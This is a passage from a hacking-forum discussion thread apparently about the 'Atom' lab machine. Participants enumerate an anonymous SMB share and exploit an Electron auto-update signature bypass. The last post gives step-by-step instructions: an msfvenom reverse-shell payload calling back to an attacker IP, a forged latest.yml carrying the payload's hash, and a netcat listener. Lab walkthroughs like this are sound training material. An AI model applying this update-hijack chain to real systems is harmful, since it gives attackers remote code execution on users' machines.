TUTORIAL Atom [Discussion]
by xicla - April 17, 2021 at 08:42 PM
#1
hi guys

ATOM user get from smb but cant do more than this i think

i decrypt .asar and nothing intrestring

i think its a BoF in program
Reply
#2
I think you have to drop a fake update ( reverse shell ) in the smb share, and find a method to execute it
Reply
#3
i think there is hash check as well. :-|
Reply
#4
(April 17, 2021 at 09:54 PM)lingling40hrs Wrote: i think there is hash check as well. :-|

LOL what commands did y'all hit to get into SMB I can't get anywhere inside it
Reply
#5
use smbclient -N “\\\\ip-of-box\\Software_Updates”
Reply
#6
(April 17, 2021 at 10:12 PM)xploiter Wrote:
(April 17, 2021 at 09:54 PM)lingling40hrs Wrote: i think there is hash check as well. :-|

LOL what commands did y'all hit to get into SMB I can't get anywhere inside it

list the smb folders with:
smbclient -L //<<ip>>/ (press enter when asking for a pass)
then try anonymous login to the last listed folder:
smbclient //<<ip>>/Software_Updates -U ""
Reply
#7
(April 17, 2021 at 10:15 PM)sanakasa Wrote:
(April 17, 2021 at 10:12 PM)xploiter Wrote:
(April 17, 2021 at 09:54 PM)lingling40hrs Wrote: i think there is hash check as well. :-|

LOL what commands did y'all hit to get into SMB I can't get anywhere inside it

list the smb folders with:
smbclient -L //<<ip>>/ (press enter when asking for a pass)
then try anonymous login to the last listed folder:
smbclient //<<ip>>/Software_Updates -U ""

thanks I did that guess what I just found latest.yml inside /client2/ and then suddenly it was gone and it contained a string encoded

o19abYhqcLJ9dceeMZ+5qHYIQhYHKuckLHdqBYBCru61TypaaYbUAql0un8Aeao1s7HovyCkcERLWEWL4Q2N7g==

weird, that it's not base64
Reply
#8
Maybe it needs something to do with electron builder auto updates

https://blog.doyensec.com/2020/02/24/ele...ypass.html
Reply
#9
(April 17, 2021 at 10:36 PM)ylifeqsa Wrote: Maybe it needs something to do with electron builder auto updates

https://blog.doyensec.com/2020/02/24/ele...ypass.html

I've found this article and tried to put a powershell reverse shell one liner instead of calc... no sucess so far. Will try harder
Reply
#10
looks like that url might work, tried doing the example to pop calc on a win vm with the command injection but no go
even tried with an exe with a ' in it's name and a sha256 of the file and put the yml and i didnt see the process kick off in procexplorer
Reply
#11
i've tried following the article but maybe i'm missing something. can anyone give a nudge?
Reply
#12
For getting USER:

Do the following:
1. msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.12.14.105 LPORT=1337 -f exe > "r'Shell.exe"
2. sha512sum r\'Shell.exe
3. Copy the sha512sum go to cyberchef and select from hex, to base64 then copy that base64 encoded string to your yaml file to look like this:
version: 1.0.2
path: http://10.12.14.105/r'Shell.exe
sha512: C94F3x7tx5dDDhALW+XX1M6Klrg9e9J23gB8BYrw9S6INsqU4nWcwrVt1Pr976LsS906lFolZxPXTqgmLADtJQ==
4. Start python3 server
5. Start netcat listener
6. upload the latest.yml file to smb share to any of the clients folder
7. Wait and pray for shell.
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB Fortress Synacktiv (DISCUSSION) pheonix2021 27 4,489 5 hours ago
Last Post: paulwatson42016
TUTORIAL HTB Love [DISCUSSION!!] En3rypt3D 43 7,007 10 hours ago
Last Post: seeisknow
TUTORIAL HTB pivotapi [DISCUSSION] pheonix2021 51 9,556 Yesterday at 06:00 AM
Last Post: ashmitadhikari

 Users browsing this thread: 1 Guest(s)